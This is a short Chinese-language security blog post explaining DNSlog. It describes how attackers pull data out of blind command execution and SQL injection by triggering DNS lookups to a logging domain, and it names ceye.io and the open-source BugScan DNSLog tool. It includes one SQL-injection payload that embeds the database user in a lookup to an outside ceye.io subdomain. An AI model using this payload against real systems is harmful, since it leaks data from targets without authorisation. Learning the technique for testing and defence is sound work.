DNS log 学习

作者: print("") 分类: 信息安全 发布时间: 2019-06-07 10:14

DNSLOG的原理

DNS的解析是递归与迭代相结合的,下面给出了当我们访问 www.o2oxy.cn 时.

最后面访问的还是该域名的NS 服务器。阿里云的域名的NS 记录都是可以修改的。也就是说。如果我们本地建立一个NS 的DNS 就可以控制到解析

DNSLOG工具

如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可:

https://github.com/BugScanTeam/DNSLog

另外我们也可以使用在线平台:

http://ceye.io

此次用的是ceye.io 

在浏览器访问一下

在记录中就可以查询到了。那么在其他方面可以利用吗? 如下:

命令执行无回显的情况下:

然后在后台看看情况

发下是root 用户。

那么还有没有其他的利用方式呢?

有的。SQL  注入和其他漏洞也可以使用的

例子:SQL 注入

pyload:

select load_file(concat(‘\\\\’, user(), ‘.hfkzaq.ceye.io’))

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

1
说点什么

avatar
1 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
GxBSXUKing Recent comment authors
  Subscribe  
最新 最旧 得票最多
提醒
GxBSXUKing
游客
GxBSXUKing

太菜了,看不懂。